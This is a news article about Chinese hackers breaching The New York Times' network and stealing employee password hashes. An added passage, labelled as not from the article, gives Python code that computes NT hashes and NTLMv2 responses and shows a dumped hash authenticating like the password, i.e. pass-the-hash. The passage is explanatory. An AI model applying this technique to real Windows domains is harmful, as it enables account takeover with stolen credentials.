Computerworld

New York Times computer network breached by Chinese hackers, paper says

The computers of 53 employees were accessed and several email accounts were compromised, the paper reported

Hackers from China breached the computer network of The New York Times and stole passwords that allowed them to gain access to computers and email accounts for a period of four months, the newspaper reported late Wednesday.

The initial intrusion happened sometime around Sept. 13 while the Times reporters were working on a story about the multibillion-dollar fortune accumulated by relatives of China's Prime Minister Wen Jiabao, the Times report said.

It's not clear how the hackers originally gained access to the Times' network, but computer forensics experts from IT security firm Mandiant, which was contracted to investigate the incident, believe that the organization's employees might have been targeted via spear phishing -- an attack technique that involves sending specifically crafted email messages with malicious links or attachments.

The hackers' activity on the network increased after the story about the Chinese prime minister's relatives and their wealth was published in late October, the Times said. The newspaper was aware of warnings from Chinese officials that investigating Wen's relatives would have consequences, the Times said.

AT&T was asked by the Times to monitor its computer network for suspicious activity and started seeing behavior consistent with cyberattacks believed to be associated with the Chinese military on Oct. 25. After learning of this activity, the Times briefed the FBI and tried to eliminate the attackers from its systems.

However, on Nov. 7 it became clear that the hackers still had a foothold on some of the systems and the newspaper contracted Mandiant. This marked the beginning of a larger investigation that involved monitoring how the attackers moved around the network for several months in order to learn their habits and discover all backdoors they might have installed.

The Mandiant investigators established that the hackers had stolen usernames and password hashes for all Times employees from the network's domain controller and used them to gain access to the computers of 53 employees.
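The article does not say whether the stolen hashes were cracked or simply replayed, but the practitioner's point is that on a Windows domain the NT hash is the credential: NTLM authentication derives the response from the hash, never from the password itself, so a dump of the domain controller's hashes is enough to log in as any user. The following is an added example (not from the article, the Times, or Mandiant) that shows this in code: a pure-Python MD4 (RFC 1320) to compute the NT hash, the NTLMv2 proof per MS-NLMP, and a "legitimate client" and an "attacker holding only the dumped hash" producing responses that the domain controller verifies identically. The user, domain and password are constructed placeholders; the client blob is simplified to the fields needed for the computation.

```python
import hashlib
import hmac
import os
import struct
import time

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable on OpenSSL 3."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    # Padding: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length.
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + func(b, c, d) + X[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers for the next step
        A, B, C, D = (A + a) & MASK, (B + b) & MASK, (C + c) & MASK, (D + d) & MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """What the domain controller stores for a user: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16le"))


def ntlmv2_response(nthash: bytes, user: str, domain: str,
                    server_challenge: bytes, client_blob: bytes) -> bytes:
    """NTLMv2 response (MS-NLMP 3.3.2). The input is the NT hash, not the password."""
    v2_key = hmac.new(nthash, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    proof = hmac.new(v2_key, server_challenge + client_blob, hashlib.md5).digest()
    return proof + client_blob


def dc_verify(stored_nthash: bytes, user: str, domain: str,
              server_challenge: bytes, response: bytes) -> bool:
    """Domain controller side: recompute the proof from its stored hash and compare."""
    proof, blob = response[:16], response[16:]
    expected = ntlmv2_response(stored_nthash, user, domain, server_challenge, blob)[:16]
    return hmac.compare_digest(proof, expected)


def make_blob() -> bytes:
    """Simplified NTLMv2 client blob: version, reserved, timestamp, nonce, padding."""
    filetime = int(time.time()) * 10_000_000 + 116444736000000000
    return b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime) + os.urandom(8) + b"\x00" * 4


def demo_pass_the_hash(user="jdoe", domain="EXAMPLE", password="Spring2012!"):
    """Constructed scenario: returns (client_ok, attacker_ok); both come back True."""
    dc_stored_hash = nt_hash(password)      # DC copy; this is what a DC dump yields
    server_challenge = os.urandom(8)
    # Legitimate client derives the hash from the password it knows.
    client_resp = ntlmv2_response(nt_hash(password), user, domain, server_challenge, make_blob())
    # Attacker never saw the password; it holds only the dumped hash.
    attacker_resp = ntlmv2_response(dc_stored_hash, user, domain, server_challenge, make_blob())
    return (dc_verify(dc_stored_hash, user, domain, server_challenge, client_resp),
            dc_verify(dc_stored_hash, user, domain, server_challenge, attacker_resp))


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("client ok, attacker ok:", demo_pass_the_hash())
```

The consequence for incident response is the one the Times' multi-month cleanup implies: once the domain controller's hash store has been read, every account password must be changed, because leaving any hash unchanged leaves that account's credential in the attacker's hands regardless of whether the plaintext was ever recovered.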

The hackers were also able to access the email accounts of David Barboza, the Times' Shanghai bureau chief who wrote the story about Wen Jiabao's relatives, and Jim Yardley, the Times' South Asia bureau chief in India.

The main target of the attackers appears to have been Barboza's email correspondence and documents related to the investigation he performed for that story, the Times report said. Marc Frons, the Times' chief information officer, said that the hackers could have wreaked havoc on the organization's systems, but they were not interested in doing that.

Mandiant's investigators believe the attackers are part of a known Chinese hacker group specialized in APT (advanced persistent threat) attacks that previously targeted other Western organizations and American military contractors. The group routed their attacks through compromised computers owned by universities in North Carolina, Arizona, Wisconsin and New Mexico, as well as computers owned by small U.S. companies and Internet service providers.

The attacks might be part of a larger campaign targeting journalists, the Times said, citing a December intelligence report from Mandiant that mentioned APT-style attacks against 30 journalists and executives at Western news outlets.

Mandiant did not immediately respond to a request for more information about the attacks.

According to the Times report, Mandiant investigators determined that hackers used 45 pieces of custom malware in the attacks against the New York Times over three months, but only one of them was detected by the antivirus products from Symantec used by the newspaper on its systems.

Advanced attacks like the one described in the New York Times article "underscore how important it is for companies, countries and consumers to make sure they are using the full capability of security solutions," Symantec said Thursday in a statement sent via email.

"The advanced capabilities in our endpoint offerings, including our unique reputation-based technology and behavior-based blocking, specifically target sophisticated attacks," the company said. "Turning on only the signature-based anti-virus components of endpoint solutions alone is not enough in a world that is changing daily from attacks and threats. We encourage customers to be very aggressive in deploying solutions that offer a combined approach to security. Anti-virus software alone is not enough."

News of this attack comes on the heels of a recent debate among security and antivirus experts regarding the effectiveness of desktop antivirus products at detecting new threats that don't have a widespread distribution, like the type of malware used in APT attacks. The discussion was prompted by a study released by security firm Imperva in December, which concluded that newly created threats have an initial antivirus detection rate of under 5 percent.

Even though the methodology used in the study was heavily criticized as being flawed and inaccurate, some experts strongly believe that desktop antivirus products are incapable of detecting the custom malware used today in targeted attacks against organizations.

"From my own experience, within corporate/enterprise networks, desktop antivirus detection typically hovers at 1-2% for the threats that make it through the various network defenses," Gunter Ollmann, the chief technology officer at security consultancy firm IOActive, said earlier this month in a blog post. "For newly minted malware that is designed to target corporate victims, the rate is pretty much 0% and can remain that way for hundreds of days after the malware has been released into the wild."